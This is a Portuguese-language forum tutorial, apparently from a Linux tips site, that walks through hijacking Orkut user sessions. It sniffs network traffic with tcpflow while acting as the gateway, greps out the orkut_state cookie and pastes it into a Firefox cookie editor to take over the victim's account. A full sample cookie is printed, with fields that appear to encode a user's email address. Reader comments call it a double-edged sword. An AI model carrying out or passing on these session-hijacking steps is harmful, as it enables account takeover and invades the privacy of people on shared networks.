Estamos seguros no orkut?
Sou muito curioso na área de segurança e acabei descobrindo algo interessante. Muitos membros aqui já brincaram um pouco de hacker, pois bem, estou postando um tutorial que explora uma falha do Orkut. Espero que o Orkut resolva mais este bug...
Instalando o tcpflow (Sniffer)
Primeiramente iremos instalar um analisador de tráfego, o famoso
tcpflow . Para quem nunca utilizou, peço que dê uma olhadinha no site:
Instale ou baixe o pacote já pronto.
CentOS:
# yum install tcpflow
Debian:
# apt-get install tcpflow
Slackware:
# wget http://linuxpackages.inode.at/Slackware-12.0/Console/tcpflow/tcpflow-0.21-i486-1kan.tgz
# installpkg tcpflow-0.21-i486-1kan.tgz
:D
Sniffando rede Orkut
Bem, primeiramente precisamos ser o gateway da rede para analisarmos o tráfego pelo tcpflow. Segue o comando:
# tcpflow -i eth1 host www.orkut.com.br
No parâmetro acima pegamos todo o tráfego do domínio orkut.com.br. Deixe rodando por 3 minutos e finalize.
Digite:
# cat * | grep orkut_state
Ira aparecer uma lista enorme com vários caractere... Procure pelo cookie chamado orkut_state.
ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0:
USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1:
TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws-
cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO
YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg:
PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0:
GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:;
S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
O início tem que ser ORKUTPREF e o final S=sR9V6nHRSjxLiNw0:.
Este cookie contém todas as informações necessárias para capturar a sessão do usuário. Vou ensinar como pegar este arquivo e capturar a sessão.
:D
Utilizando o cookie
Primeiro você deve ter o Mozilla Firefox:
E o editor de cookies do Firefox:
Agora você vai em ferramentas/Cookie Editor e adicione o seguinte cookie:
Name: orkut_state
Content: Cole o cookie da vitima "ORKUTPREF=ID=", ex.:
ORKUTPREF=ID=6914954405945645074:INF=0:SET=100914668:LNG=79:CNT=29:RM=0:
USR=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:PHS=:TS=1282577740:LCL=pt-BR:NET=1:
TOS=1:GC=DQAAAHIAAAAsa6oFoD3EKn3oIzN--Fzws-
cc75k1Qa7PrlMECdkJGiCHV2qc7C3ph4YVLX5CSJj3aotEVvwC6FVJZThZNNdLGBYuCiLgIcO
YJqDG3ZMWY8daMYFnBc1YOUJ01JnvURpln3xe1C4QMVW9uIHiYJL3nQvYyoe6jRElQ4K7doNxjg:
PE=YmlhemluaGFzdWRfQGhvdG1haWwuY29t:GTI=0:GID=:VER=3:AST=0:SID=0:
GI=9185043685642045981:GTM=0:FSA=2:CU=1:GU=0:S=L+ByKo9nnXtXzT/Qr+HiO4xFhr0=:;
S=neworkut_borg=Ylnxv34anNBdLiHANiD5Vg; OSN=ID=FE6rpebB8Zs=:S=sR9V6nHRSjxLiNw0:
Domain: www.orkut.com.br
Path: /
Never Expires
Abra o site:
E pronto... está utilizando a sessão do cara.
Interessante, mas tomem cuidado.
valmeida@idea-planejamento.com
Outras dicas deste autor
Reduzindo o tempo de carregamento de seu site
Exploit dá acesso root em máquina local - kernels 2.6.17 e 2.6.24.1
Explorando vulnerabilidades em websites
Instalando Tcptrack no Slackware 13
Controle de banda com Shaper
Leitura recomendada
Acesso remoto no Insigne 5.0 por SSH
Criando pacotes RPM com o rpmbuild
Minhas impressões sobre o Slint 14.2
Atualizando para o novo Fedora 22
Coaching Gratuito em Linux
Comentários
Desculpe a pergunta ingénua, mas só funciona na rede local?
Mensagem
Desculpe a pergunta ingénua, mas só funciona na rede local?
muito boa sua dica, o problema são as pessoas irresponsáveis (pseudo-hackerzinhos) ou mal intencionadas que possam fazer uso de algo tão bem descrito.
uma faca de 2 gumes: difundir conhecimento e ao mesmo tempo dar a arma pro bandido.
veja bem, não é crítica ao seu trabalho, apenas uma reflexão do tempo em que vivemos.
Mensagem
muito boa sua dica, o problema são as pessoas irresponsáveis (pseudo-hackerzinhos) ou mal intencionadas que possam fazer uso de algo tão bem descrito.
uma faca de 2 gumes: difundir conhecimento e ao mesmo tempo dar a arma pro bandido.
veja bem, não é crítica ao seu trabalho, apenas uma reflexão do tempo em que vivemos.
Desculpe a pergunta ingénua, mas só funciona na rede local? [2]
Mensagem
Desculpe a pergunta ingénua, mas só funciona na rede local? [2]
Funciona como gateway da rede. Imagina isso em um provedor de acesso?
Mensagem
Funciona como gateway da rede. Imagina isso em um provedor de acesso?
Mensagem
Fonte pode ser baixado
http://fossies.org/unix/privat/tcpflow-0.21.tar.gz
./configure
make
make install
:)
Contribuir com comentário
Enviar